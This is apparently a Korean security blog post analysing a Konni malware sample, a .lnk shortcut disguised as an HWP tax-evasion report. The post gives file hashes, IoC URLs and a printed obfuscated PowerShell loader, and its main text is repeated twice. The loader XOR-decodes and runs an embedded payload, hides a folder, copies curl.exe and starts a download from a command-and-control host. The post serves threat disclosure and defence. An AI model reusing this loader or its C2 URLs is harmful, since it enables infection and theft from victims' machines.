탈세제보로 위장한 Konni(코니) 에서 만든 악성코드-첨부1_소명자료 목록(탈세제보)(2024.4.5)
Contents
오늘도 북한 해킹 단체 Konni(코니) 에서 만든 악성코드인 첨부1_소명자료 목록(탈세제보)(2024.4.5)에 대해 알아보는 시간을 가져 보겠습니다.
해당 악성코드는 hwp 즉 한글과 컴퓨터에서 만든 HWP 첨부 파일처럼 돼 있는 lnk 파일이며 해당 악성코드를 hwp 즉 한글과 컴퓨터에서 만든 HWP 로 생각을 하고 실행을 하면 PowerShell(파워셀)를 통해서 해당 악성코드가 동작하게 구성이 돼 있습니다. 먼저 해당 악성코드의 해쉬값은 다음과 같습니다.
파일명:첨부1_소명자료 목록(탈세제보).hwp.lnk
사이즈:136 KB
MD5:9d6c79c0b395cceb83662aa3f7ed0123
SHA-1:65f5f7d127c478522e9669200de20000edcb6cfb
SHA-256:2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e
PowerShell 코드
c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQ(A)cjvWqTWLATHZCqoATzG (z)vpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESU RkbbEfWgcLVep(X)BQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHj uQNHCakQwkvfexCFsKuzAkzcXvpnd(N)HJbTQQnPxsGyzEJuYXSEMtbgHipKLg LYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodja bnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgEC(k0) dcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtS aeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxr BrsSqjZJHwfNQjydVdr(T)VcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmn GwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgb BFCaLZNMVAQjVBLRqGW(T)MdpheNRzqKXTtTzqKa(S)mkkTkTeqPo(u)YEonoypuVXim vkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBws KhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMk(s)SGUwHrgGnFGcAHKutaNdpAThEKYGN(a)ZxWa eruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGz wCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgV(A)KRaWkbbpPeRYizaNJbWzqALF fEn(b)cHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnm LaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden funct(i)on JogMjclR PK(){$zPedYniBf(y)=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-o bject{$_.length -eq 0(x)0002233E};$nJlRQzeAUMCXVjArUNw(=)$zPedYniBfy;$z PedYniBfy(=)$zPedYniBfy^(|)Select-Object -ExpandProperty (N)ame;if($zPe dYniBfy(.)length -eq 0){cd $env:TE(M)P;$zPedYniBfy=Get-ChildItem *.lnk ;$zP(e)dYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$n JlR(Q)zeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};func tion pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$z(P)edYniBfy=$dj(L)utZCNrS[0] ;$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPed YniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEo(T)XlI=JogMjc lR(P)K;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]: :new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[Sy( s)tem.IO.FileAcc(e)ss]::ReadWrite,[System.IO.FileShare]::None));try{$Cv ytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKL tldjopW=$CvytSiJOHD.ReadByte(s)(0x00006C00);}finally{$CvytSiJOHD.Close( )};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$f(K)LtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[Sys tem.IO.File]::WriteAllBytes($djLutZ(C)NrS,$fKLtldjopW);$oE(e)fgawPUH='. \'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQ aW;$WrKnPB(w)fdh=JogMjclRPK;remov(e)-item -path $WrKnPBwfdh[1] -force;& mkdir c:\GSlLzFnTov & attrib (+)h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov ( &) copy c:\windows\system32\curl(.)exe GSlLzFnTov(.)exe & GSlLzFnTov -k (-o …
해당 악성코드는 hwp 즉 한글과 컴퓨터에서 만든 HWP 첨부 파일처럼 돼 있는 lnk 파일이며 해당 악성코드를 hwp 즉 한글과 컴퓨터에서 만든 HWP 로 생각을 하고 실행을 하면 PowerShell(파워셀)를 통해서 해당 악성코드가 동작하게 구성이 돼 있습니다. 먼저 해당 악성코드의 해쉬값은 다음과 같습니다.
파일명:첨부1_소명자료 목록(탈세제보).hwp.lnk
사이즈:136 KB
MD5:9d6c79c0b395cceb83662aa3f7ed0123
SHA-1:65f5f7d127c478522e9669200de20000edcb6cfb
SHA-256:2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e
PowerShell 코드
c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQ(A)cjvWqTWLATHZCqoATzG (z)vpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESU RkbbEfWgcLVep(X)BQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHj uQNHCakQwkvfexCFsKuzAkzcXvpnd(N)HJbTQQnPxsGyzEJuYXSEMtbgHipKLg LYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodja bnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgEC(k0) dcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtS aeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxr BrsSqjZJHwfNQjydVdr(T)VcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmn GwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgb BFCaLZNMVAQjVBLRqGW(T)MdpheNRzqKXTtTzqKa(S)mkkTkTeqPo(u)YEonoypuVXim vkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBws KhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMk(s)SGUwHrgGnFGcAHKutaNdpAThEKYGN(a)ZxWa eruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGz wCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgV(A)KRaWkbbpPeRYizaNJbWzqALF fEn(b)cHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnm LaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden funct(i)on JogMjclR PK(){$zPedYniBf(y)=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-o bject{$_.length -eq 0(x)0002233E};$nJlRQzeAUMCXVjArUNw(=)$zPedYniBfy;$z PedYniBfy(=)$zPedYniBfy^(|)Select-Object -ExpandProperty (N)ame;if($zPe dYniBfy(.)length -eq 0){cd $env:TE(M)P;$zPedYniBfy=Get-ChildItem *.lnk ;$zP(e)dYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$n JlR(Q)zeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};func tion pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$z(P)edYniBfy=$dj(L)utZCNrS[0] ;$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPed YniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEo(T)XlI=JogMjc lR(P)K;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]: :new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[Sy( s)tem.IO.FileAcc(e)ss]::ReadWrite,[System.IO.FileShare]::None));try{$Cv ytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKL tldjopW=$CvytSiJOHD.ReadByte(s)(0x00006C00);}finally{$CvytSiJOHD.Close( )};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$f(K)LtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[Sys tem.IO.File]::WriteAllBytes($djLutZ(C)NrS,$fKLtldjopW);$oE(e)fgawPUH='. \'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQ aW;$WrKnPB(w)fdh=JogMjclRPK;remov(e)-item -path $WrKnPBwfdh[1] -force;& mkdir c:\GSlLzFnTov & attrib (+)h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov ( &) copy c:\windows\system32\curl(.)exe GSlLzFnTov(.)exe & GSlLzFnTov -k (-o …
IoC
2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e
65f5f7d127c478522e9669200de20000edcb6cfb
9d6c79c0b395cceb83662aa3f7ed0123
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0
https://jethropc.com/wp-admin/css/temp/hurry/?rv=pap
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1
65f5f7d127c478522e9669200de20000edcb6cfb
9d6c79c0b395cceb83662aa3f7ed0123
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0
https://jethropc.com/wp-admin/css/temp/hurry/?rv=pap
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1